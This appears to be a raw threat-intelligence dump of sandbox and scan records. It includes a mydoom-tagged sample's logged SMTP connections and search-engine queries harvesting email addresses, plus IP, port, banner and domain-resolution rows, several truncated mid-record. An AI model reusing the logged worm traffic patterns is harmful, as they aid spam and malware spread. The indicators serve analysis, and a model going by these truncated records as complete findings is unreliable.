[targetUID: 00000000-00004324]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ZxcvbnData\\3.0.0.0\\manifest.fingerprint]- [targetUID: 00000000-00004324]\n "safety_tips.pb" has type "data"- Location: [%TEMP%\\4324_1134055185\\safety_tips.pb]- [targetUID: 00000000-00004324]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\4324_607486025\\Filtering Rules]- [targetUID: 00000000-00004324]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\4324_607486025\\LICENSE]- [targetUID: 00000000-00004324]\n "Part-NL" has type "PGP symmetric key encrypted data -"- Location: [%TEMP%\\4324_607486025\\Part-NL]- [targetUID: 00000000-00004324]\n "717e6579-f8b4-4a68-a10c-3da7c69a712b.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\717e6579-f8b4-4a68-a10c-3da7c69a712b.tmp]- [targetUID: 00000000-00004324]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://20.224.2.213/"\n Pattern match: "http://20.224.2.213"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/91 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\4324_1765292486\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00004324]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\4324_607486025\\adblock_snippet.js]- [targetUID: 00000000-00004324]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\4324_1765292486\\shopping_iframe_driver.js]- [targetUID: 00000000-00004324]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\4324_1765292486\\shoppingfre.js]- [targetUID: 00000000-00004324]\n Dropped file: "edge_driver.js" - Location: [%TEMP%\\4324_1765292486\\edge_driver.js]- [targetUID: 00000000-00004324]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\4324_1765292486\\auto_open_controller.js]- [targetUID: 00000000-00004324]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\4324_1765292486\\edge_tracking_page_validator.js]- [targetUID: 00000000-00004324]\n Dropped file: "product_page.js" - Location: [%TEMP%\\4324_1765292486\\product_page.js]- [targetUID: 00000000-00004324]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\4324_1765292486\\edge_checkout_page_validator.js]- [targetUID: 00000000-00004324]\n Dropped file: "shopping.js" - Location: [%TEMP%\\4324_1765292486\\shopping.js]- [targetUID: 00000000-00004324]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\4324_607486025\\Part-RU]- [targetUID: 00000000-00004324]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'String', u'identifier': u'string-93', u'name': u'Found browser information locations related strings', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 2, u'description': u'"C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00004324-00000BE4-1152268696\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\\reports" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00004324-00000BE4-1157860885\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\\attachments" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00004324-00000BE4-1163368179\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\OptimizationGuidePredictionModels" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00004324-00000BE4-10605614793\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokens" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00004324-00000BE4-11366423098\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\db2c4955-3bea-43fa-be55-7de371ad84ea" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00004324-00000BE4-27061915827\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\ 20.224.2.213 2022-12-18 00:12:23 Physical Location No ipapi.co 0 0 2 0 None Campinas, Sao Paulo, SP, Brazil, BR 20.226.83.185 2022-12-18 00:09:22 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.6:8443 188.114.96.0/24 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None WLAN (Net ID: 00:01:24:F0:97:C1) 37.7803446,-122.3906132 2022-12-18 00:13:04 Affiliate Description - Category No DuckDuckGo 0 0 3 0 None Orange S.A. lfbn-nic-1-332-104.w90-116.abo.wanadoo.fr 2022-12-18 00:23:19 Country No Country Name Extractor 0 1 2 0 None Switzerland Zurich, Zurich, 8000, Switzerland, Europe 2022-12-18 00:19:20 Raw Data from RIRs No Hybrid Analysis 0 0 3 0 None [{u'subsystem': None, u'classification_tags': [u'mydoom', u'upx'], u'crowdstrike_ai': None, u'total_processes': 2, u'threat_score': 100, u'compromised_hosts': [u'17.172.224.47', u'209.202.251.1'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'document.cmd', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-4', u'name': u'Creates a writable file in a temporary directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"" created file "%TEMP%\\zincite.log"\n "" created file "%TEMP%\\tmpC968.tmp"\n "" created file "%TEMP%\\tmpC968.tmp\\:Zone.Identifier:$DATA"\n "" created file "%TEMP%\\tmpC9E1.tmp"\n "" created file "%TEMP%\\tmpC9E1.tmp\\:Zone.Identifier:$DATA"\n "" created file "%TEMP%\\tmpCA46.tmp"\n "services.exe" created file "%TEMP%\\zincite.log"\n "services.exe" created file "%TEMP%\\cd9dSmjhn.log"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"216.97.88.9:25"\n "17.151.62.66:25"\n "17.151.62.68:25"\n "17.151.62.67:25"\n "17.171.2.60:25"\n "212.227.17.8:25"\n "212.227.15.17:25"\n "82.165.230.17:25"\n "193.175.80.161:25"\n "17.171.2.72:25"\n "17.171.2.68:25"\n "17.172.224.47:25"\n "217.12.15.96:80"\n "209.202.251.1:80"\n "162.209.107.11:25"\n "144.76.235.113:25"\n "192.153.166.6:25"\n "64.79.149.147:25"\n "74.208.5.20:25"\n "74.208.5.22:25"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IESQMMUTEX_0_208"\n "RasPbFile"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!IETld!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!kcpmawt!appdata!roaming!microsoft!windows!ietldcache!"\n "\\Sessions\\1\\BaseNamedObjects\\IESQMMUTEX_0_191"\n "\\Sessions\\1\\BaseNamedObjects\\RasPbFile"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZoneAttributeCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\_!MSFTHISTORY!_"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!kcpmawt!appdata!roaming!microsoft!windows!cookies!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!kcpmawt!appdata!local!microsoft!windows!history!history.ie5!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\WininetStartupMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\WininetConnectionMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\WininetProxyRegistryMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!kcpmawt!appdata!local!microsoft!windows!temporary internet files!content.ie5!"\n "Local\\_!MSFTHISTORY!_"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-2', u'name': u'GETs files from a webserver', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET /web/results?q=mailto+j3e.de&kgs=0&kls=0&nbq=50 HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: www.altavista.com\nConnection: Keep-Alive"\n "GET /search?p=mail+apple.com&ei=UTF-8&fr=fp-tab-web-t&cop=mss&tab=&n=100 HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: search.yahoo.com\nConnection: Keep-Alive"\n "GET /default.asp?lpv=1&loc=searchhp&tab=web&query=mail+web.de HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: search.lycos.com\nConnection: Keep-Alive"\n "GET /?fr=altavista HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nConnection: Keep-Alive\nHost: search.yahoo.com"\n "GET /default.asp?lpv=1&loc=searchhp&tab=web&query=mailto+j3e.de HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: search.lycos.com\nConnection: Keep-Alive"\n "GET /default.asp/?lpv=1&loc=searchhp&tab=web&query=mail+web.de HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: search.lycos.com\nConnection: Keep-Alive\nCookie: PHPSESSID=u5ajgnl0cncnbg33l3cqkd4210"\n "GET /default.asp/?lpv=1&loc=searchhp&tab=web&query=mailto+j3e.de HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: search.lycos.com\nConnection: Keep-Alive\nCookie: PHPSESSID=nk5rco1pvk06lvada52c9f0op3"\n "GET /default.asp?lpv=1&loc=searchhp&tab=web&query=reply+unicode.org HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: search.lycos.com\nConnection: Keep-Alive\nCookie: PHPSESSID=u5ajgnl0cncnbg33l3cqkd4210"\n "GET /default.asp/?lpv=1&loc=searchhp&tab=web&query=reply+unicode.org HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: search.lycos.com\nConnection: Keep-Alive\nCookie: PHPSESSID=nk5rco1pvk06lvada52c9f0op3"\n "GET /default.asp?lpv=1&loc=searchhp&tab=web&query=j3e.de+email HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: search.lycos.com\nConnection: Keep-Alive\nCookie: PHPSESSID=nk5rco1pvk06lvada52c9f0op3"\n "GET /default.asp/?lpv=1&loc=searchhp&tab=web&query=j3e.de+email HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: search.lycos.com\nConnection: Keep-Alive\nCookie: PHPSESSID=nk5rco1pvk06lvada52c9f0op3"\n "GET /default.asp?lpv=1&loc=searchhp&tab=web&query=web.de+contact+email HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: search.lycos.com\nConnection: Keep-Alive\nCookie: PHPSESSID=nk5rco1pvk06lvada52c9f0op3"\n "GET /default.asp/?lpv=1&loc=searchhp&tab=web&query=web.de+contact+email HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: search.lycos.com\nConnection: Keep-Alive\nCookie: PHPSESSID=nk5rco1pvk06lvada52c9f0op3"\n "GET /web/results?q=mail+j3e.de&kgs=0&kls=0 HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: www.altavista.com\nConnection: Keep-Alive"\n "GET /search?p=mailto+j3e.de&ei=UTF-8&fr=fp-tab-web-t&cop=mss&tab=&n=100 HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: search.yahoo.com\nConnection: Keep-Alive\nCookie: B=dbc2c8lcc2fkn&b=3&s=um; sSN=K6M9XX42wWEVOgI.qU904hemoucerAtomzLTgeEd2JkbeOhCV0pJfKxvyNGZCYbqj5sQ8a.Y_aP_dEX4sNUoqw--"\n "GET /web/results?q=contact+email+unicode.org&kgs=0&kls=0&nbq=20 HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: www.altavista.com\nConnection: Keep-Alive"\n "GET /search?p=web.de+mailto&ei=UTF-8&fr=fp-tab-web-t&cop=mss&tab=&n=100 HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: search.yahoo.com\nConnection: Keep-Alive\nCookie: B=dbc2c8lcc2fkn&b=3&s=um; sSN=K6M9XX42wWEVOgI.qU904hemoucerAtomzLTgeEd2JkbeOhCV0pJfKxvyNGZCYbqj5sQ8a.Y_aP_dEX4sNUoqw--"\n "GET /default.a 81.88.48.101 2022-12-18 00:21:51 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 172.67.137.37 2022-12-18 00:06:51 Open TCP Port No Pulsedive 0 0 2 0 None 172.67.137.37:443 172.67.137.37 2022-12-18 00:21:37 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Accept-Ranges: bytes Cache-Control: public, max-age=0 Last-Modified: Wed, 02 Nov 2022 16:43:18 GMT ETag: W/"44-1843939c80b" Content-Type: text/html; charset=UTF-8 Content-Length: 68 Date: Connection: keep-alive Keep-Alive: timeout=5 20.226.83.185 2022-12-18 00:03:39 Malicious Internet Name Yes CloudFlare Malware DNS 0 1 1 0 None Blocked by CloudFlare DNS [misogyny.wtf] misogyny.wtf 2022-12-18 00:21:17 Open TCP Port No Censys 0 0 2 0 None 188.114.96.1:8880 188.114.96.1 2022-12-18 00:20:59 Raw Data from RIRs No Censys 0 0 2 0 None {"last_updated_at": "2022-12-17T20:29:44.410Z", "ip": "2606:4700:3033::6815:1cf0", "location_updated_at": "2022-12-03T13:27:53.341659Z", "autonomous_system_updated_at": "2022-12-15T11:12:41.495737Z", "location": {"country": "United States", "coordinates": {"latitude": 37.751, "longitude": -97.822}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "", "country_code": "US", "timezone": "America/Chicago", "continent": "North America"}, "dns": {"records": {"repcioprodemexev.cf": {"record_type": "AAAA", "resolved_at": "2022-09-22T13:12:34.335311921Z"}, "earn100dollarstoday.com": {"record_type": "AAAA", "resolved_at": "2022-11-18T13:12:16.277422126Z"}, "papislot88.online": {"record_type": "AAAA", "resolved_at": "2022-12-13T17:27:29.538095705Z"}, "smallroomy.site": {"record_type": "AAAA", "resolved_at": "2022-11-20T16:59:22.666881336Z"}, "bonanzatradisibet.com": {"record_type": "AAAA", "resolved_at": "2022-12-02T13:14:04.259151592Z"}, "kyoto888.com": {"record_type": "AAAA", "resolved_at": "2022-12-11T13:41:46.584789071Z"}, "efileperm.com": {"record_type": "AAAA", "resolved_at": "2022-12-09T13:18:47.471783046Z"}, "cpcalendars.sectraexpress.com": {"record_type": "AAAA", "resolved_at": "2022-12-08T13:55:48.288358322Z"}, "foxnews-lifestyle-blog-2478237649.za.com": {"record_type": "AAAA", "resolved_at": "2022-12-13T20:00:21.718823396Z"}, "mediametrix.ru": {"record_type": "AAAA", "resolved_at": "2022-12-11T16:48:16.814639070Z"}, "www.innerreachescounselling.com.au.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2022-10-28T15:43:22.731629900Z"}, "unafinen.cf": {"record_type": "AAAA", "resolved_at": "2022-11-25T12:30:17.920562607Z"}, "arttherapycolouringbook.org": {"record_type": "AAAA", "resolved_at": "2022-12-01T16:40:41.766356107Z"}, "rwmillerplumbing.com": {"record_type": "AAAA", "resolved_at": "2022-12-13T14:10:24.574667193Z"}, "www.xn--malmrrmokare-7ibb.se": {"record_type": "AAAA", "resolved_at": "2022-12-07T17:24:30.486402294Z"}, "mail.sectraexpress.com": {"record_type": "AAAA", "resolved_at": "2022-11-20T14:01:21.503378112Z"}, "cpcontacts.sectraexpress.com": {"record_type": "AAAA", "resolved_at": "2022-11-29T13:58:34.097869492Z"}, "daydreamerph.com": {"record_type": "AAAA", "resolved_at": "2022-12-14T13:26:18.934398940Z"}, "www.freelancejobsdb.com": {"record_type": "AAAA", "resolved_at": "2022-11-23T15:58:44.609666488Z"}, "www.earn100dollarstoday.com": {"record_type": "AAAA", "resolved_at": "2022-11-28T13:11:31.929865077Z"}, "mxx2020.com": {"record_type": "AAAA", "resolved_at": "2022-12-10T13:32:45.975286922Z"}, "sheilamichaud.com": {"record_type": "AAAA", "resolved_at": "2022-12-13T14:10:51.542773956Z"}, "kingstonassim.net": {"record_type": "AAAA", "resolved_at": "2022-11-13T15:38:55.954418555Z"}, "leaseislim.com": {"record_type": "AAAA", "resolved_at": "2022-12-11T13:42:12.341163044Z"}, "jakevogelpohl.com": {"record_type": "AAAA", "resolved_at": "2022-11-27T13:24:57.179978393Z"}, "www.ic-agency.com": {"record_type": "AAAA", "resolved_at": "2022-12-09T13:29:16.589244520Z"}, "www.eshutter.com.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2022-12-04T15:53:55.557031240Z"}, "makecoloradohome.com": {"record_type": "AAAA", "resolved_at": "2022-12-05T13:38:59.828798047Z"}, "wailacamatcoman.gq": {"record_type": "AAAA", "resolved_at": "2022-11-24T14:48:07.849772634Z"}, "stocsubtrorilabi.cf": {"record_type": "AAAA", "resolved_at": "2022-12-14T12:33:05.139838928Z"}, "www.rogpol.com.pl": {"record_type": "AAAA", "resolved_at": "2022-11-25T17:04:24.636613956Z"}, "neva.news": {"record_type": "AAAA", "resolved_at": "2022-12-11T16:31:31.034925098Z"}, "tilburg-zonnepaneel.nl": {"record_type": "AAAA", "resolved_at": "2022-11-29T16:34:05.587034691Z"}, "mwexcellence.com": {"record_type": "AAAA", "resolved_at": "2022-11-25T13:41:12.239337100Z"}, "www.lucaslawrencehamilton.com": {"record_type": "AAAA", "resolved_at": "2022-11-28T13:28:37.382347015Z"}, "holistic-holidays.com": {"record_type": "AAAA", "resolved_at": "2022-11-20T13:29:50.235437517Z"}, "limekilnsoftware.com": {"record_type": "AAAA", "resolved_at": "2022-11-20T13:36:31.136396537Z"}, "bomapunorthno.ga": {"record_type": "AAAA", "resolved_at": "2022-12-11T07:54:52.832997419Z"}, "kataclotimo.ml": {"record_type": "AAAA", "resolved_at": "2022-12-12T23:53:58.848847627Z"}, "nagpalclothing.com": {"record_type": "AAAA", "resolved_at": "2022-12-13T13:55:42.612657295Z"}, "www.eshutter.com": {"record_type": "CNAME", "resolved_at": "2022-12-11T13:26:58.782654298Z"}, "www.gsb.group": {"record_type": "AAAA", "resolved_at": "2022-12-08T14:50:03.504145435Z"}, "garageshedcarportbuilder.com": {"record_type": "AAAA", "resolved_at": "2022-12-13T13:26:04.059048706Z"}, "cpanel.sectraexpress.com": {"record_type": "AAAA", "resolved_at": "2022-12-09T14:02:13.774105248Z"}, "webminders.it": {"record_type": "AAAA", "resolved_at": "2022-12-04T15:14:16.127245896Z"}, "ontontocaltersla.tk": {"record_type": "AAAA", "resolved_at": "2022-11-14T16:49:07.690130423Z"}, "leloptotib.tk": {"record_type": "AAAA", "resolved_at": "2022-12-02T19:41:14.583035822Z"}, "meetlanorr.tk": {"record_type": "AAAA", "resolved_at": "2022-12-05T17:04:42.757367178Z"}, "resweireanetimi.ml": {"record_type": "AAAA", "resolved_at": "2022-12-09T15:17:04.536159109Z"}, "colvirbstugal.tk": {"record_type": "AAAA", "resolved_at": "2022-11-24T16:43:03.243171370Z"}, "accreditedhomegoodsonline.com": {"record_type": "AAAA", "resolved_at": "2022-11-27T12:32:13.889538711Z"}, "yquqxrm.tk": {"record_type": "AAAA", "resolved_at": "2022-12-13T00:24:31.856245021Z"}, "cpanel.protipsnetbd.com": {"record_type": "AAAA", "resolved_at": "2022-10-29T18:59:35.908349611Z"}, "cpcontacts.carstenjohnsen.org": {"record_type": "AAAA", "resolved_at": "2022-12-06T17:37:32.363682394Z"}, "sfjjxd.top": {"record_type": "AAAA", "resolved_at": "2022-11-09T16:38:56.260826814Z"}, "www.dr-mahe.com": {"record_type": "AAAA", "resolved_at": "2022-11-19T13:14:24.700818150Z"}, "www.missionspower.org": {"record_type": "CNAME", "resolved_at": "2022-12-01T16:42:51.713371290Z"}, "sapnemedekhna.com": {"record_type": "AAAA", "resolved_at": "2022-12-15T13:57:52.400597943Z"}, "naresdiapormasit.ga": {"record_type": "AAAA", "resolved_at": "2022-12-07T15:07:35.636246521Z"}, "tticarotliesan.ml": {"record_type": "AAAA", "resolved_at": "2022-11-19T15:09:51.128787748Z"}, "trk.healthlifestories.com": {"record_type": "AAAA", "resolved_at": "2022-11-27T13:20:02.593065499Z"}, "aiiasp.com": {"record_type": "AAAA", "resolved_at": "2022-12-01T12:41:14.777541457Z"}, "lojacirandadesign.com.br": {"record_type": "AAAA", "resolved_at": "2022-11-07T12:19:59.619365038Z"}, "xoso6677.com": {"record_type": "AAAA", "resolved_at": "2022-11-25T14:22:09.717871886Z"}, "meovanew.tk": {"record_type": "AAAA", "resolved_at": "2022-12-14T17:42:19.596891632Z"}, "kkk898.vip": {"record_type": "AAAA", "resolved_at": "2022-11-20T17:12:37.405886422Z"}, "sapatoalto.com.br": {"record_type": "AAAA", "resolved_at": "2022-10-24T09:52:40.281460006Z"}, "kavethyls.tk": {"record_type": "AAAA", "resolved_at": "2022-12-02T17:25:04.023912466Z"}, "www.guideplugin.com.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2022-12-14T16:13:40.657706208Z"}, "cold-boat-3fda.2864713421.workers.dev": {"record_type": "AAAA", "resolved_at": "2022-11-21T14:21:18.246672242Z"}, "www.webminders.it": {"record_type": "AAAA", "resolved_at": "2022-11-21T14:47:59.778954287Z"}, "banadislifo.tk": {"record_type": "AAAA", "resolved_at": "2022-11-22T16:56:32.784672802Z"}, "blogcast.support": {"record_type": "AAAA", "resolved_at": "2022-12-04T17:20:24.016832384Z"}, "www.mediametrix.ru": {"record_type": "AAAA", "resolved_at": "2022-11-30T16:55:45.682027528Z"}, "webdisk.nensi.eu": {"record_type": "AAAA", "resolved_at": "2022-11-13T14:26:06.988304058Z"}, "warmodeon.com": {"record_type": "AAAA", "resolved_at": "2022-12-10T14:04:27.488932415Z"}, "gamewinwin.net": {"record_type": "AAAA", "resolved_at": "2022-12-15T16:02:24.221785118Z"}, "tlosguaconfma.cf": {"record_type": "AAAA", "resolved_at": "2022-12-10T12:28:48.978211423Z"}, "dzhxsbhjl.monster": {"record_type": "AAAA", "resolved_at": "2022-11-19T13:36:58.210837152Z"}, "recovery.rcvry.workers.dev": {"record_type": "AAAA", "resolved_at": "2022-11-19T14:29:41.972384241Z"}, "lagostechweek.ng": {"record_type": "AAAA", "resolved_at": "2022-12-05T16:40:44.108614046Z"}, "cpanel.coloradotravel.biz": {"record_type": "AAAA", "resolved_at": "2022-12-15T12:12:37.051912937Z"}, "enantrafhinktrel.gq": {"record_type": "AAAA", "resolved_at": "2022-12-08T14:49:05.835559949Z"}, "freelancejobsdb.com": {"record_type": "AAAA", "resolved_at": "2022-11-22T09:21:04.975125532Z"}, "konfmembcos.ga": {"record_type": "AAAA", "resolved_at": "2022-11-28T11:14:00.013477500Z"}, "relugamredilib.gq": {"record_type": "AAAA", "resolved_at": "2022-12-06T07:51:56.412624431Z"}, "shvabe-sport.ru": {"record_type": "AAAA", "resolved_at": "2022-11-08T16:46:10.506430579Z"}, 